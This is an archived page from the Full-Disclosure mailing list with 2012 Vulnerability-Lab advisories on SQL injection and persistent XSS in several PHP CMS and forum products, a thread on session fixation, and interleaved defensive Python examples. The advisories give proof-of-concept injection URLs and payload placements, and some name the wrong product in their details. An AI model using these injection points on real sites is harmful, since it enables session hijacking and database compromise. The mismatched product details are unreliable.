[Full-disclosure] Event Calendar PHP 1.2 - Multiple Web Vulnerabilities

2012-07-16 Thread Research
Title:
==
Event Calendar PHP 1.2 - Multiple Web Vulnerabilities


Date:
=
2012-06-19


References:
===
http://www.vulnerability-lab.com/get_content.php?id=607


VL-ID:
=
607


Common Vulnerability Scoring System:

7.1


Introduction:
=
Event Calendar PHP main features:

simple and user friendly admin area
any language support
full control over the CSS of calendar and events style
one single step installation
easy to include into your webpage - just drop a single line of code
create unlimited number of calendars per website
each event has date, start time, end time, title, price, maximum
attendance, description and event photo/image
different types for showing events on the calendar - in the calendar date 
cell, with tooltips, with popup window
option to hide expired events from calendar
fully readable and simple php source code
W3C validated events RSS feed

You can see the demo of Event Calendar PHP. Also check the administrator area.
If needed, we can modify your Event Calendar PHP script for a reasonable price.
FREE INSTALLATION - If you are having trouble with the installation, we will do 
it free for you. Just email us at i...@eventcalendarphp.com
Requirements: PHP 4.3 or higher and MySQL 3 or higher running on your webserver.
Current stable version of Event Calendar PHP is 1.2 

( Copy of the Vendor Homepage: http://www.eventcalendarphp.com )


Abstract:
=
The Vulnerability Laboratory Research Team discovered multiple web
vulnerabilities in Event Calendar PHP 1.2 CMS.


Report-Timeline:

2012-06-17: Public Disclosure


Status:

Published


Exploitation-Technique:
===
Remote


Severity:
=
High


Details:

1.1
Multiple SQL Injection vulnerabilities are detected in the Funeral Script PHP
Content Management System.
The vulnerability allows an attacker (remote) or local low privileged user
account to inject/execute own sql commands
on the affected application dbms without user interaction. The vulnerabilities
are located in the funeral_script.php
& admin.php files and the bound vulnerable parameters orderBy, orderType &
hide_cat. Successful exploitation of the
vulnerability results in dbms & application compromise.

Vulnerable File(s):
[+] admin.php
[+] preview.php

Vulnerable Parameter(s):
[+] orderBy
[+] orderType


1.2
Multiple persistent input validation vulnerabilities are detected in the
Funeral Script PHP Content Management System.
The bugs allow remote attackers to implement/inject malicious script code on
the application side (persistent).
The vulnerabilities are located in the

Successful exploitation of the vulnerability can lead to session hijacking
(manager/admin) or stable (persistent)
context manipulation. Exploitation requires low user interaction & privileged
application user account.


Vulnerable Section(s):
[+] Event - Input & Listing
[+] Calendar - Input & Listing

Vulnerable Module(s):
[+] [Calendar - Name|Title & Listing]
[+] [Event - Name|Title & Listing]


Vulnerable Parameter(s):
[+] newCal - name
[+] newEvent - title




1.3
Multiple non persistent cross site scripting vulnerabilities are detected on
the ME Firewall Analyzer v7.2 Application.
The vulnerability allows remote attackers to hijack website customer, moderator
or admin sessions with medium or high
required user interaction or local low privileged user account. Exploitation
requires low user interaction or low
privileged application user account. The bugs are located in the admin.php &
funeral_script.php files with the bound
vulnerable parameters orderBy, search, orderType, p, hide_cat & obit_id.
Successful exploitation can result in account
steal, phishing & client-side content request manipulation.

Vulnerable File(s):
[+] admin.php
[+] preview.php

Vulnerable Parameter(s):
[+] cal_id, cal_month & cal_year
[+] act
[+] search


Proof of Concept:
=
1.1
The sql injection vulnerabilities can be exploited by remote attackers with
privileged user accounts & without required
user interaction. For demonstration or reproduce ...

http://127.0.0.1:80/eventcalendar/admin.php?act=calendarsorderType=DESCsearch=orderBy=-1%27[SQL-INJECTION]cal_namecal_id=2
http://127.0.0.1:80/eventcalendar/admin.php?act=calendarsorderType=-1%27[SQL-INJECTION]search=orderBy=cal_namecal_id=2
http://127.0.0.1:80/eventcalendar/admin.php?act=eventsorderType=ASC-1%27[SQL-INJECTION]orderBy=event_titlecal_id=2
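The Details section above ties the injection to the orderBy and orderType request parameters. Sort columns and sort directions are SQL identifiers and keywords, so they cannot be bound with prepared-statement placeholders; the standard fix is to resolve them through an allowlist so that only known names reach the SQL text. The following is an added example in Python (not the product's code; the table, columns and rows are constructed for the demo), showing the vulnerable concatenation next to the allowlisted version and what each does with a `-1'` value of the kind the PoC URLs use:

```python
import sqlite3

# Constructed demo schema standing in for a calendar table (not the product's real schema).
SCHEMA = "CREATE TABLE calendars (cal_id INTEGER, cal_name TEXT)"
ROWS = [(1, "team"), (2, "public"), (3, "holidays")]

# Allowlists: the only identifiers and directions that may ever reach the SQL text.
ALLOWED_ORDER_BY = {"cal_id": "cal_id", "cal_name": "cal_name"}
ALLOWED_ORDER_TYPE = {"ASC": "ASC", "DESC": "DESC"}


def unsafe_order_query(order_by, order_type):
    """Vulnerable pattern: request parameters concatenated straight into ORDER BY.
    A value such as -1' becomes part of the statement."""
    return f"SELECT cal_id, cal_name FROM calendars ORDER BY {order_by} {order_type}"


def safe_order_query(order_by, order_type):
    """Hardened pattern: both pieces are resolved through an allowlist. Unknown
    input never reaches the SQL text; it is replaced by a fixed default."""
    column = ALLOWED_ORDER_BY.get(order_by, "cal_id")
    direction = ALLOWED_ORDER_TYPE.get(str(order_type).upper(), "ASC")
    return f"SELECT cal_id, cal_name FROM calendars ORDER BY {column} {direction}"


def _demo_db():
    conn = sqlite3.connect(":memory:")
    conn.execute(SCHEMA)
    conn.executemany("INSERT INTO calendars VALUES (?, ?)", ROWS)
    return conn


def fetch_sorted(order_by, order_type):
    """Run the hardened query on an in-memory database and return the rows."""
    return _demo_db().execute(safe_order_query(order_by, order_type)).fetchall()


def unsafe_fails(order_by, order_type):
    """Run the vulnerable query with the same input. The stray quote breaks the
    statement; that syntax error is what an attacker probes for first."""
    try:
        _demo_db().execute(unsafe_order_query(order_by, order_type))
        return False
    except sqlite3.OperationalError:
        return True


if __name__ == "__main__":
    print(fetch_sorted("cal_name", "DESC"))   # sorted by name, descending
    print(fetch_sorted("-1'", "DESC"))        # unknown column -> falls back to cal_id DESC
    print(unsafe_fails("-1'", "DESC"))        # True: the concatenated query is broken
```

Note that `cal_id=2` in the PoC URLs is a value, not an identifier, and belongs in a bound parameter; the allowlist is only for the parts of the statement that placeholders cannot cover.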

[Full-disclosure] Lepton v1.2.0 CMS - Multiple Web Vulnerabilities

2012-07-16 Thread Research
Title:
==
Lepton v1.2.0 CMS - Multiple Web Vulnerabilities


Date:
=
2012-06-23


References:
===
http://www.vulnerability-lab.com/get_content.php?id=626


VL-ID:
=
626


Common Vulnerability Scoring System:

4


Introduction:
=
LEPTON is an easy-to-use but fully customizable Content Management System (CMS).
LEPTON enables you to run nearly all
the websites most other current CMS promise you, but has the big advantage of
extremely short learning and training
curves, and this is a great argument to those who work with LEPTON. LEPTON
needs a MySQL database, the most common
database on webspaces. LEPTON is easily installed and started, and - what is
really important - can easily be adapted
to fit the needs of nearly all web appearances. Besides many other features
LEPTON got ...

easy to use backend
content input via wysiwyg-editors
multi-language-support
file and media management
design via template system
addons to extend cms
scaling access system
and much more...

(Copy of the Vendor Homepage: http://www.lepton-cms.org/english.php?lang=EN )


Abstract:
=
The Vulnerability Laboratory Research Team discovered multiple Web 
Vulnerabilities in the Lepton v1.2.0 Content Management System.


Report-Timeline:

2012-06-23: Public or Non-Public Disclosure


Status:

Published


Exploitation-Technique:
===
Remote


Severity:
=
Medium


Details:

Multiple persistent input validation vulnerabilities are detected in iScripts
Reserve Logic v1.2 Booking Content Management System.
The bugs allow remote attackers to implement/inject malicious script code on
the application side (persistent). The persistent
vulnerabilities are located in the modify groups, add user, listing, Profile &
add page module(s) with the bound vulnerable parameters
Groupname, Username, Display Name & list_page_title. Exploitation requires low
user interaction & privileged application user account.
Successful exploitation of the vulnerability can lead to session hijacking
(admin) or stable (persistent) context manipulation.


Vulnerable Module(s):
[+] Modify Groups - Group
[+] Access - Add User
[+] Preferences - My Settings - Profile
[+] Add Page

Vulnerable Parameter(s):
[+] Group Name
[+] Username
[+] Display Name
[+] list_page_title & url (modify_link)


Proof of Concept:
=
The persistent web vulnerabilities can be exploited by remote attackers with
privileged user account or without user account.
To exploit the vulnerability low or medium user interaction is required. For
demonstration or reproduce ...


Review: Access - Add User & Username

form name=user 
action=http://demo.xxx.com/lepton/admins/users/add.php?leptoken=462c08f506b7992a08a40z1340321337;
 method=post class=
input name=user_id value= type=hidden
input name=username_fieldname value=username_Age0ll2 type=hidden
pMinimum length for user name: 3 chars, Minimum length for Password: 6 
chars!/p
table 0= border=0 cellpadding=0 cellspacing= width=100%
tbodytr
td width=150Username:/td
td class=value_input
input name=username_Age0ll2 value=\ type=text[PERSISTENT INJECTED 
SCRIPT CODE])' =
/td
/tr
tr
tdPassword:/td
td class=value_input
input type=password name=password value=[PERSISTENT INJECTED SCRIPT 
CODE])  /
/td
/tr
tr
tdRe-type Password:/td
td class=value_input
input type=password name=password2 value=[PERSISTENT INJECTED SCRIPT 
CODE] /
/td


URL: 
http://127.0.0.1:8080/lepton/admins/users/index.php?leptoken=0644c1632f2de642c422az1340321400



Review: Preferences - My Settings - Profile & Displayname

optgroup label=Pagesoption value=pages/modify.php?page_id=2 
selected=selected
[PERSISTENT INJECTED SCRIPT CODE]/option
option value=pages/modify.php?page_id=1hello world/option
/optgroup/select


URL: 
http://127.0.0.1:8080/lepton/admins/preferences/index.php?leptoken=43842ae95ec290c5dc346z1340321767




Review: Modify Groups - Group

table border=0 cellpadding=2 cellspacing=0 width=100%
tbodytr
td width=150Name:/td
td
input name=group_name maxlength=255 type=text[PERSISTENT INJECTED 
SCRIPT CODE]' = style=width: 98%;
/td


URL: 
http://127.0.0.1:8080/lepton/admins/groups/groups.php?leptoken=b966d35413402c86743a7z1340321327




Review: Add Page - Listing (url or link)

img src=index.php2-Dateien/visible_16.png alt=Visibility: Public 
class=page_list_rights
span class=modify_link[PERSISTENT INJECTED SCRIPT CODE]) /span/a
/td
td class=list_page_title[PERSISTENT INJECTED SCRIPT CODE]) /td
td class=list_page_URL/hello-world/[PERSISTENT INJECTED SCRIPT 
CODE]28vl29.php/td
td class=list_page_id2/td


URL: 

[Full-disclosure] VamCart v0.9 CMS - Multiple Web Vulnerabilities

2012-07-16 Thread Research
Title:
==
VamCart v0.9 CMS - Multiple Web Vulnerabilities


Date:
=
2012-06-25


References:
===
http://www.vulnerability-lab.com/get_content.php?id=622


VL-ID:
=
622


Common Vulnerability Scoring System:

4


Introduction:
=
VamCart is a Free, Open Source, CakePHP Based Shopping Cart Content Management
System. VamCart is an Open Source Project under
the GNU GPL license with the following features ...

Easy Installation.
SEO - Search Engine Optimization.
Unlimited Categories, Products.
CakePHP, MVC, Smarty.
Multi Language, Multi Currency.
Templatable.
Open Source.
Automatic Image Resize.
Product Reviews.
Coupons ...

(Copy of the Vendor Homepage: http://vamcart.com )


Abstract:
=
The Vulnerability Laboratory Research Team discovered multiple Web 
Vulnerabilities in the VamCart v0.9 Content Management System.


Report-Timeline:

2012-06-25: Public or Non-Public Disclosure


Status:

Published


Exploitation-Technique:
===
Remote


Severity:
=
Medium


Details:

Multiple persistent input validation vulnerabilities are detected in the
VamCart v0.9 Content Management System.
The bugs allow remote attackers to implement/inject malicious script code on
the application side (persistent). The persistent
vulnerabilities are located in the manage accounts, manage coupons, view orders
or order comments module(s) with the bound
vulnerable parameters comment text, coupon code, title & name. Exploitation
requires low user interaction & privileged application
user account. Successful exploitation of the vulnerability can lead to session
hijacking (admin) or stable (persistent) context manipulation.

Vulnerable Module(s):
  [+] Account & Manage Accounts & Admins Listing
  [+] Manage Coupons & Listing
  [+] View All Orders Listing
  [+] Order Comments Listing

Vulnerable Module(s):
  [+] Title
  [+] Name
  [+] Coupon Code
  [+] Comments Text


Proof of Concept:
=
The persistent input validation vulnerabilities can be exploited by low
privileged user accounts with low required user interaction.
For demonstration or reproduce ...


Review:  Users [View All] INDEX - Account Listing

tbodytrthTitle/th thAction/th/trtr class=contentRowEven 
onmouseout=this.className='contentRowEven'; 
onmouseover=this.className='contentRowEvenHover';tdadmin/td 
td align=centera href=http://127.0.0.1:1338/cmspath/users/
admin_delete/1 onclick=return confirm('Confirm delete action?');img 
src=Admins%20Listing-Dateien/delete.png alt=Delete
/a/td/trtr class=contentRowOddHover 
onmouseout=this.className='contentRowOdd'; onmouseover=this.className='
contentRowOddHover';tdiframe src=Admins%20Listing-Dateien/[PERSISTENT 
SCRIPT CODE] = td=
 td align=centera href=127.0.0.1:1338/cmspath/users/admin_delete/2 

URL: http://127.0.0.1:1338/[PATH CMS]/users/admin/


Review:  Orders [View All] INDEX via Add - Orders Listing

tr class=contentRowEven onmouseout=this.className='contentRowEven'; 
onmouseover=this.className='contentRowEvenHover';
td9 minutes ago/td tdimg src=view-allorders.1-Dateien/true.png 
alt=True/td tdiframe src=
view-allorders.1-Dateien/[PERSISTENT SCRIPT CODE] ' =[PERSISTENT SCRIPT 
CODE] ) [PERSISTENT SCRIPT CODE]  ) 
[PERSISTENT SCRIPT CODE]  [PERSISTENT SCRIPT CODE]  iframe src=a 
onload=alert(VL)
/td/tr/table/divdiv 

URL: http://127.0.0.1:1338/[PATH CMS]/orders/admin/


Review: Manage Coupons - Coupon Code Listing

tbodytrthName/th thCode/th thAction/th/trtr 
class=contentRowEven onmouseout=this.className='
contentRowEven'; onmouseover=this.className='contentRowEvenHover';tda 
href=http://127.0.0.1:1338/module_coupons/admin/
admin_edit/1no ^^ /a/td td
[PERSISTENT SCRIPT CODE])' = td= tda 

URL: http://127.0.0.1:1338/[PATH CMS]/module_coupons/admin/admin_index/


Risk:
=
The security risk of the persistent web vulnerabilities is estimated as medium.


Credits:

Vulnerability Laboratory [Research Team]  -Benjamin Kunz Mejri 
(b...@vulnerability-lab.com)


Disclaimer:
===
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability-Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and 
capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, 
indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have 
been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential 
or incidental damages so the foregoing limitation 
may 

[Full-disclosure] SMF Board v2.0.2 - Multiple Web Vulnerabilities

2012-07-16 Thread Research
Title:
==
SMF Board v2.0.2 - Multiple Web Vulnerabilities


Date:
=
2012-06-25


References:
===
http://www.vulnerability-lab.com/get_content.php?id=596


VL-ID:
=
624


Common Vulnerability Scoring System:

4.1


Introduction:
=
Simple Machines Forum — SMF in short — is a free, professional grade software 
package that allows you to set up 
your own online community within minutes. Its powerful custom made template 
engine puts you in full control of 
the layout of your message board and with our unique SSI - or Server Side 
Includes - function you can let your 
forum and your website interact with each other. SMF is written in the popular 
language PHP and uses a MySQL database. 
It is designed to provide you with all the features you need from a bulletin 
board while having an absolute minimal 
impact on the resources of the server. SMF is the next generation of forum 
software - and best of all it is and 
will always remain completely free!

(Copy of the Vendor Homepage: http://www.simplemachines.org/ ) 


Abstract:
=
The Vulnerability Laboratory Research Team discovered multiple web 
vulnerabilities in the official SMF v2.0.2 (Forum Application).


Report-Timeline:

2012-06-23: Public or Non-Public Disclosure


Status:

Published


Affected Products:
==
SMF
Product: Simple Machines Forum v2.0.2


Exploitation-Technique:
===
Remote


Severity:
=
Medium


Details:

Multiple persistent input validation vulnerabilities are detected in the
official SMF v2.0.2 (Board|Forum Application) CMS.
The bugs allow remote attackers to implement/inject malicious script code on
the application side (persistent). The persistent
vulnerabilities are located in the package manager, smiley sets, newsletter and
edit members or groups with the vulnerable bound
post parameters local path url, username, url, emails & title. Exploitation
requires low user interaction & privileged application
user account. Successful exploitation of the vulnerability can lead to session
hijacking (admin/mod/user) or stable (persistent)
manipulation of the web application context.

Vulnerable Section(s):
  [+] Package Manager & Download New Packages & FTP Information Required
  [+] Smiley Sets & Add
  [+] Newsletter & Add
  [+] My Community & Administration Center & Membergroups & Edit Membergroups


Vulnerable Module(s):
  [+] Local path to SMF & Username [Packages]
  [+] URL
  [+] Name of emails
  [+] Name & Group Title


Proof of Concept:
=
The persistent input validation vulnerability can be exploited by remote
attackers with local low privileged user account & low required
user interaction. For demonstration or reproduce ...

Review: Package Manager & Download New Packages & FTP Information Required
(Listing)

dd
input size=30 name=ftp_server id=ftp_server type=text[PERSISTENT 
SCRIPT CODE]' = class=input_text
label for=ftp_portPort:nbsp;/label 
input type=text size=3 name=ftp_port id=ftp_port value=21 
class=input_text /

... or


dd
input size=50 name=ftp_path id=ftp_path value=public_html/demo/smf  
type=text[PERSISTENT SCRIPT CODE])' = style=width: 99%; 
class=input_text
/dd
/dl
div class=righttext


URL: 
http://127.0.0.1:1339/smf/index.php?action=admin;area=packages;sa=packageget;get;f5073d7837d8=5a2bdd540a245be265f26c102fff9626



Review: Smiley Sets & Add

tr class=windowbg id=list_smiley_set_list_0
td style=text-align: center;/td
td class=windowbgAkyhne's Set/td
td class=windowbg[PERSISTENT SCRIPT CODE]' = strong=
akyhne/strong/.../td


URL: 
http://127.0.0.1:1339/smf/index.php?action=admin;area=smileys;sa=modifyset;set=2


Review: Newsletter & Add

input name=email_force value=0 type=hidden
input name=total_emails value=1 type=hidden
input name=max_id_member value=13 type=hidden
input name=groups value=0,1,2,3 type=hidden
input name=exclude_groups value=0,1,2,3 type=hidden
input name=members value= type=hidden
input name=exclude_members value= type=hidden
input name=emails value= type=hidden[PERSISTENT SCRIPT CODE])' =
/form
/div
br class=clear /
/div

URL: 
http://127.0.0.1:1339/smf/index.php?action=admin;area=news;sa=mailingmembers;b74f235ec=2b30f2b9aad6e26815e1c18594922b37


Review: Edit Membergroups & User/Groups Listing

h3 class=catbgEdit Membergroup - [PERSISTENT SCRIPT CODE])' 
=[PERSISTENT SCRIPT CODE]) 
ifram
/h3
/div
div class=windowbg2
span class=topslicespan/span/span

URL: 
http://127.0.0.1:1339/smf/index.php?action=admin;area=membergroups;sa=index;b74f235ec=2b30f2b9aad6e26815e1c18594922b37
URL: 
http://127.0.0.1:1339/smf/index.php?action=admin;area=membergroups;sa=add;b74f235ec=2b30f2b9aad6e26815e1c18594922b37



Risk:
=
The 

[Full-disclosure] PBBoard v2.1.4 CMS - Multiple Web Vulnerabilities

2012-07-16 Thread Research
Title:
==
PBBoard v2.1.4 CMS - Multiple Web Vulnerabilities


Date:
=
2012-06-26


References:
===
http://www.vulnerability-lab.com/get_content.php?id=623



VL-ID:
=
625


Common Vulnerability Scoring System:

4.5


Introduction:
=
PBBoard forum is a free and very famous flat-forum bulletin board software. 

- LICENSE: http://www.pbboard.com/manual/license.txt
- INSTALL And UPGRADE : http://www.pbboard.com/pbb_manual/README.html
- English Style : http://www.pbboard.com/forums/t6478.html
- Languages : http://www.pbboard.com/forums/index.php?page=pagesshow=1id=6
- Converter: http://www.pbboard.com/forums/index.php?page=pagesshow=1id=3
- contact us: http://www.pbboard.com/forums/index.php?page=sendsendmessage=1

(Copy of the Vendor Homepage: http://www.pbboard.com/ )


Abstract:
=
The Vulnerability Laboratory Research Team discovered multiple Web 
vulnerabilities in the PBBoard v2.1.4  forum application.



Report-Timeline:

2012-06-26: Public Disclosure


Status:

Published


Exploitation-Technique:
===
Remote


Severity:
=
Medium


Details:

A persistent web vulnerability is detected in the PBBoard v2.1.4 forum
application.
The bug allows remote attackers to implement/inject malicious script code on
the application side (persistent).
The persistent vulnerability is located in the add poll function when adding a
thread. The malicious code can be injected in the `answer field`.
The output listing page with the poll executed the malicious persistent script
code (JS/HTML).
Successful exploitation of the vulnerability can lead to stable (persistent)
context manipulation.
Exploitation requires low user interaction.

Vulnerable Module(s): 
 [+] Add thread & Add poll

Vulnerable Parameter(s): 
 [+] [Answer]


Proof of Concept:
=
The persistent input validation vulnerabilities can be exploited by remote
attackers with low privileged
user account & required user interaction. For demonstration or reproduce ...

To reproduce the vulnerability, the attacker should add a new thread and then
check the add poll button. After that
the attacker can add his malicious code in the answer field of the poll. Anyone
who is viewing that thread will be
exploited by the malicious code. Such an attack can result in session hijacking,
redirecting or cookie theft. Moreover,
the persistent XSS can be exploited to launch a CSRF attack to the user and to
exploit the other CSRF vulnerabilities
in the same product to completely hack the application.

Poll:  iframe src=http://www.vuln-lab.com/iframe !
/span
/td
/tr
tr align=center
td class=thead width=95% colspan=3
Question :strongiframe 
src=http://www.vuln-lab.com/iframe !/strong
/td
/tr   tr
td class=row1 width=50%
input type=radio name=answer value=0
iframe src=http://www.vw.de/iframe/td
td class=row1 width=40%
 img src=look/styles/forum/main/images/bar_right.gif alt= width=4 
height=11img src=look/styles/forum/main/images/bar.gif
 alt= width=0 height=11img 
src=look/styles/forum/main/images/bar_left.gif alt= width=4 height=11
/td
td class=row1 width=12% align=center
Voters: 0   /td
/tr

tr
td class=row1 width=50%
input type=radio name=answer value=1
[PERSISTENT SCRIPT CODE]/iframe/td
td class=row1 width=40%
img src=look/styles/forum/main/images/bar_right.gif alt= width=4 
height=11
img src=look/styles/forum/main/images/bar.gif alt= width=0 height=11
img src=look/styles/forum/main/images/bar_left.gif alt= width=4 
height=11
/td
td class=row1 width=12% align=center


Risk:
=
The security risk of the persistent input validation vulnerabilities is 
estimated as medium(+).







Credits:

Vulnerability Laboratory [Research Team] - Ibrahim El-Sayed (the StOrM)
(st...@vulnerability-lab.com)




Disclaimer:
===
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability-Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and 
capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, 
indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have 
been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential 
or incidental damages so the foregoing limitation 
may not apply. 

Domains:www.vulnerability-lab.com   - www.vuln-lab.com
Contact:ad...@vulnerability-lab.com - 

Re: [Full-disclosure] Predefined Post Authentication Session ID Vulnerability

2012-07-16 Thread Douglas Huff

On Jul 13, 2012, at 11:07, Tim tim-secur...@sentinelchicken.org wrote:

> This is complicated, but it's not that much more complicated than what
> existing MitM tools, such as sslstrip, already do.

Better. I'm fairly certain this entire attack could be automated/orchestrated 
with mitmproxy with close to zero code changes.

Only hard part is the procurement of a ca that will work on the target or 
finding some behind the firewall app to target that already uses a 
self-signed/invalid cert the users are used to clicking through.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] Blackboard Mobile Learn v3.0 - Persistent Web Vulnerability

2012-07-16 Thread Research
Title:
==
Blackboard Mobile Learn v3.0 - Persistent Web Vulnerability


Date:
=
2012-05-29


References:
===
http://www.blackboard.com/Platforms/Learn/Overview.aspx


VL-ID:
=
580


Common Vulnerability Scoring System:

3.5


Introduction:
=
Blackboard Learn technology helps you make learning more effective in and 
beyond the traditional walls. Breathing life into 
educational content.  Bringing efficiency to day-to-day tasks. Empowering 
instructors with tools to engage every learner. 
Motivating them on the devices they rely on. Promoting collaboration and 
streamlining processes.
You’ll have the right toolkit
—one that is proven and constantly evolves to meet your needs. It will be 
flexible and easy to use—from managing content, 
engaging learners to assessing outcomes. And we’ll help you manage change and 
increase adoption.

Blackboard Mobile™ Learn
All your learning resources at their fingertips.

The Blackboard Mobile™ Learn platform takes interactive teaching and learning 
mobile, giving students and educators access to 
their courses, content and organizations on a variety of devices including 
iOS®, Android™, BlackBerry®, and webOS® smartphones.


Abstract:
=
The Vulnerability Laboratory Research Team discovered Persistent cross site 
scripting in Blackboard Learn v9.


Report-Timeline:

2012-05-29: Public or Non-Public Disclosure


Status:

Published


Exploitation-Technique:
===
Remote


Severity:
=
Medium


Details:

Multiple persistent input validation vulnerabilities are detected in the
Blackboard Learn v9 mobile application.
The bugs allow remote attackers to implement/inject malicious script code on
the application side (persistent).
The persistent vulnerability is located in the Question answer module with the
bound vulnerable smart text parameter.
Successful exploitation of the vulnerability can lead to persistent session
hijacking (manager/admin) or stable
(persistent) context manipulation. Exploitation requires low user interaction
& privileged user account.

Vulnerable Module(s): 
[+] Question answer

Vulnerable Parameters(s): 
[+] smart text - input


Proof of Concept:
=
The persistent vulnerability can be exploited by remote attackers with low
required user interaction. For demonstration or reproduce ...

If there is a survey that is created by the administrator of the Blackboard and
in that survey there are some questions that you
answer, you can inject a malicious code as the answer of such a question.
Note: it is working when the input type of the
answer is Smart Text or HTML, but not tested on TEXT as input. More details in
the attached image.


Solution:
=
There should be a validation on the input of the answer to survey questions.
Also parse the section where the script is getting executed.
Moreover, there should be filtering of or exceptions for some suspicious words,
i.e., iframe, script, tags etc.


Risk:
=
The security risk of the persistent input validation vulnerabilities is
estimated as medium(+).


Credits:

Vulnerability Laboratory [Research Team] - Ibrahim El-Sayed (the_storm) 
[st...@vulnerability-lab.com] [iel-sayed.blogspot.com]


Disclaimer:
===
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability-Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and 
capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, 
indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have 
been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential 
or incidental damages so the foregoing limitation 
may not apply. 

Domains:www.vulnerability-lab.com   - www.vuln-lab.com
Contact:ad...@vulnerability-lab.com - supp...@vulnerability-lab.com 
- resea...@vulnerability-lab.com
Section:video.vulnerability-lab.com - forum.vulnerability-lab.com   
- news.vulnerability-lab.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab 
- youtube.com/user/vulnerability0lab

Any modified copy or reproduction, including partially usages, of this file 
requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is 
granted. All other rights, including the use of other 
media, are reserved by 

Re: [Full-disclosure] Predefined Post Authentication Session ID Vulnerability

2012-07-16 Thread Douglas Huff
You are absolutely right. I guess we can no longer suppose factoring large 
primes is hard either. Fuck that baby, the bath water is dirty!

-- 
Douglas Huff

On Jul 13, 2012, at 12:00, Григорий Братислава musntl...@gmail.com wrote:

> PS (is excuse my manner) is no take my message about your is nonsense
> personal Tim. MusntLive is most respect Chicken Soldiers and Soldier
> Chickens. MusntLive is never discriminate even is against poultry.
> MusntLive is support PETA
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Predefined Post Authentication Session ID Vulnerability

2012-07-16 Thread Douglas Huff

On Jul 13, 2012, at 13:24, Gage Bystrom themadichi...@gmail.com wrote:

> Well if I understand Tim correctly you wouldn't need a CA. In the attack he
> mentioned not once do you ever actually look at the ssl content. He's talking
> about redirecting them to plain http and then setting the session cookie and
> redirecting them back.
>
You're right. I misread slightly. Same tool would still work just scrap the ca
comment. :)
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
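The attack discussed in this thread plants a session cookie on the victim over plain HTTP before they authenticate, so that the application later marks an id the attacker already knows as logged in. The control that defeats it is to never promote a pre-authentication session id: at login the server discards whatever id the client presented and issues a fresh, server-generated one. The following is an added example in Python, not code from anyone in the thread; `SessionStore` is a constructed in-memory stand-in for a real session backend, shown with the fixation-prone login next to the regenerating one:

```python
import secrets


class SessionStore:
    """Constructed in-memory session store: sid -> {"user": None or username}."""

    def __init__(self):
        self.sessions = {}

    def new_session(self):
        """Anonymous session issued on first visit; the id is server-generated."""
        sid = secrets.token_urlsafe(32)
        self.sessions[sid] = {"user": None}
        return sid

    def login_fixated(self, presented_sid, user):
        """Vulnerable: trusts whatever id the client presented and marks it
        authenticated. If that id was planted before login (the plain-HTTP
        redirect in the thread), whoever planted it now holds a logged-in session."""
        self.sessions.setdefault(presented_sid, {"user": None})["user"] = user
        return presented_sid

    def login(self, presented_sid, user):
        """Hardened: the pre-login id is invalidated and a fresh id is issued.
        A planted id never becomes an authenticated one."""
        self.sessions.pop(presented_sid, None)
        sid = secrets.token_urlsafe(32)
        self.sessions[sid] = {"user": user}
        return sid

    def user_for(self, sid):
        """Authenticated user bound to sid, or None for unknown/anonymous ids."""
        return self.sessions.get(sid, {}).get("user")


def set_cookie_header(sid):
    """Cookie attributes for the regenerated id. Secure keeps the server's cookie
    off plain HTTP; HttpOnly keeps it away from script. Neither stops a planted
    cookie on its own, which is why regeneration in login() is the decisive control."""
    return f"session={sid}; Path=/; Secure; HttpOnly; SameSite=Lax"


def demo():
    """Returns True when the hardened login no longer honours a planted id."""
    planted = "attacker-chosen-id"          # constructed: an id set by someone else
    weak = SessionStore()
    weak.login_fixated(planted, "alice")    # planted id is now alice's session
    strong = SessionStore()
    fresh = strong.login(planted, "alice")  # planted id discarded, new id issued
    return (weak.user_for(planted) == "alice"
            and strong.user_for(planted) is None
            and strong.user_for(fresh) == "alice"
            and fresh != planted)


if __name__ == "__main__":
    print(demo())
```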

[Full-disclosure] Linux - Indicators of compromise

2012-07-16 Thread Ali Varshovi
Greetings FD,

Does anyone have any guidelines/useful material on analyzing logs of a Linux
machine to detect signs of compromise? The data collection piece is not a
challenge as a lot of useful information can be captured using commands and
some scripts. I'm wondering if there is any systematic approach to analyze the
collected logs? Most of the materials I've seen are more aligned to malware and
rootkit detection which is not the only concern apparently.

Thanks,
Ali
-
Sent from my BlackBerry device

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
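The question above asks for a systematic way to turn collected Linux logs into indicators of compromise rather than a rootkit scan. One workable approach is to express each indicator as a small, testable rule over parsed log lines and run the whole set as a report. The following is an added example in Python, not from anyone in the thread; the auth.log excerpt is constructed for the demo (RFC 3164 style sshd and useradd lines) and the three rules cover a login accepted from a source that had already failed repeatedly, any direct root login, and a UID 0 account created under a name other than root:

```python
import re
from collections import Counter

# Constructed sample auth.log excerpt, not a real capture.
SAMPLE_AUTH_LOG = """\
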